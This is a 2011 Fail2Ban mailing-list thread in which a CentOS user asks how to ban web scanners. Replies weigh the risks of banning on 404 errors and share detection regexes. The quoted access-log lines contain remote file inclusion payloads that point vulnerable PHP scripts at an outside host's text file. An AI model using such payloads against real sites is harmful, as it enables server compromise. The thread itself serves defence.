From: Tim <ti...@ec...> - 2011-12-19 10:20:01
|
Hi People,

Many thanks to those who spend their time on Fail2Ban, a fantastic tool.

I have been using F2B for a couple of years with great results, but I am now having trouble with attempts to find files with vulnerabilities, or at least that is what I think it is. I am getting hundreds of log lines like the following every day:

62.225.155.90 - - [18/Dec/2011:20:40:56 +0000] "GET /administrator/images/publish_y.png?mosConfig_absolute_path=http://62.141.58.186/google.txt HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
62.225.155.90 - - [18/Dec/2011:20:40:56 +0000] "GET /administrator/images/save.png?mosConfig_absolute_path=http://62.141.58.186/google.txt HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
62.225.155.90 - - [18/Dec/2011:20:41:27 +0000] "GET /ajax/loadsplash.php?full_path=http://62.141.58.186/google.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
62.225.155.90 - - [18/Dec/2011:20:41:45 +0000] "GET /apbn/templates/head.php?APB_SETTINGS[template_path]=http://62.141.58.186/google.txt HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

I want to get Fail2Ban to block these attempts, but I can't find much info about doing so. On this page http://www.fail2ban.org/wiki/index.php/Apache it says: "Under CentOS / RedHat Enterprise Linux, httpd (Apache) is not compiled with tcpwrappers support. As a result the example in jail.conf called "apache-tcpwrapper" does not work since /etc/hosts.deny does not affect apache."

Can anyone please point me in the right direction to get this sorted? The version I am using (according to /usr/share/fail2ban/common) is "0.8.4", running on CentOS 5.7.

Thanks for any help you can offer.

PS. Please be gentle, I am something of a dimwit with Linux. |
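For reference, fail2ban 0.8.x ships an apache-noscript filter aimed at exactly this kind of error-log probing; a minimal jail sketch might look like the following (the logpath, action, and ban settings here are assumptions for a stock CentOS Apache layout, not tested values):

```ini
[apache-noscript]
enabled  = true
filter   = apache-noscript
action   = iptables-multiport[name=noscript, port="http,https"]
# CentOS writes Apache errors here by default (an assumption; adjust to taste)
logpath  = /var/log/httpd/error_log
maxretry = 6
bantime  = 600
```

Note that this filter watches the error log rather than the access log quoted above: each of those 404s produces a corresponding "File does not exist" line in the error log, which is what the filter matches.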
From: Ben J. <be...@in...> - 2011-12-19 22:02:34
|
Tim,

While it is possible to ban people (or bots) based on these types of events, doing so could have unintended and undesirable consequences.

For example, this type of banning makes it possible for a malicious individual to deny access to legitimate users. Such an individual could create specially crafted links to your site that intentionally trigger 404 errors, and encourage users to click on them. Those users would then be banned. Imagine if these links began appearing before yours in search engine results... You would need to be especially careful if you were to ban large IP blocks.

Think about search engines, too. A few broken links on your site could cause a legitimate bot, like Google's, to be banned, which could hurt search engine rankings considerably for a public-facing site.

Finally, a slight misconfiguration on your end, e.g. incorrect paths to images in CSS files, could cause all visitors to your site to be banned: as soon as a visitor hits the page, several 404s result, and the visitor's IP is banned.

Are these risks that you're willing to take in order to stop the probing? Unless your server's resources are being consumed by these malicious 404s, I wouldn't worry about it. You should be far more concerned with the requests that DON'T generate 404s, as those files are actually present and, if vulnerable, should be the focus of your attention.

Rather than ban these IPs, I would force Apache authentication over SSL on directories that should be reserved for administrative use (if practical), enable the "apache-auth" filter in fail2ban, and review the log entries for these directories regularly. Needless to say, you should also ensure that software is kept up to date on the server.

Hope that helps,
-Ben
|
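A sketch of the kind of lockdown Ben describes, combining HTTP Basic authentication with an SSL requirement on an admin directory (the directory path, realm name, and htpasswd location are hypothetical examples, not taken from the thread):

```apacheconf
<Directory "/var/www/html/administrator">
    # Refuse plain-HTTP access so credentials never travel unencrypted
    SSLRequireSSL
    AuthType Basic
    AuthName "Restricted admin area"
    # Hypothetical path; create with: htpasswd -c /etc/httpd/conf/htpasswd someuser
    AuthUserFile /etc/httpd/conf/htpasswd
    Require valid-user
</Directory>
```

With something like this in place, failed login attempts appear in the error log, where the stock apache-auth filter Ben mentions can pick them up.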
From: Brian K. <ch...@sm...> - 2011-12-20 00:19:37
|
On Dec 19, 2011, at 1:45 AM, Tim wrote:
> I want to get Fail2Ban to block these attempts but I can't find much info about doing so.

I use this on OpenBSD:

failregex = ^[[].*[]] [[]error[]] [[]client <HOST>[]] (File does not exist|script not found or unable to stat): .*(\.php|\.asp|\.exe|\.pl)$
            ^[[].*[]] [[]error[]] [[]client <HOST>[]] File does not exist: .*(php|[Aa]dmin[Mm]y[Ss][Qq][Ll].*)$

and ban with a packet filter. You should be able to use the iptables jail (I use PF on OpenBSD). I haven't had any collateral damage, but then again I have very few dynamic components.
Even though there's not much attack surface on my site, I'd rather ban reconnaissance attempts than give an attacker unlimited chances to get lucky. Before I implemented this filter, I checked my logs carefully to see how many 404s there were and fixed all the broken links (search spiders have very long memories).

--
chort |
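Brian's first expression can be sanity-checked outside fail2ban with plain Python. In this sketch the `<HOST>` tag is replaced with a simple IPv4 capture group (an approximation; fail2ban's real `<HOST>` pattern is broader), the `[[]`/`[]]` character-class escapes are rewritten as backslash escapes, and the log line is a hypothetical Apache error_log entry corresponding to one of the probes in Tim's access log:

```python
import re

# Brian's first failregex, translated: <HOST> swapped for a simple IPv4
# named group, and bracket classes like [[] rewritten as \[ for clarity.
failregex = (r'^\[.*\] \[error\] \[client (?P<host>\d{1,3}(?:\.\d{1,3}){3})\] '
             r'(?:File does not exist|script not found or unable to stat): '
             r'.*(?:\.php|\.asp|\.exe|\.pl)$')

# Hypothetical error_log line matching the loadsplash.php probe above.
line = ('[Sun Dec 18 20:41:27 2011] [error] [client 62.225.155.90] '
        'File does not exist: /var/www/html/ajax/loadsplash.php')

m = re.search(failregex, line)
print(m.group('host') if m else 'no match')  # -> 62.225.155.90
```

fail2ban itself ships a fail2ban-regex command-line tool that performs the same kind of check against a real log file and filter, which is the more direct way to validate a candidate failregex.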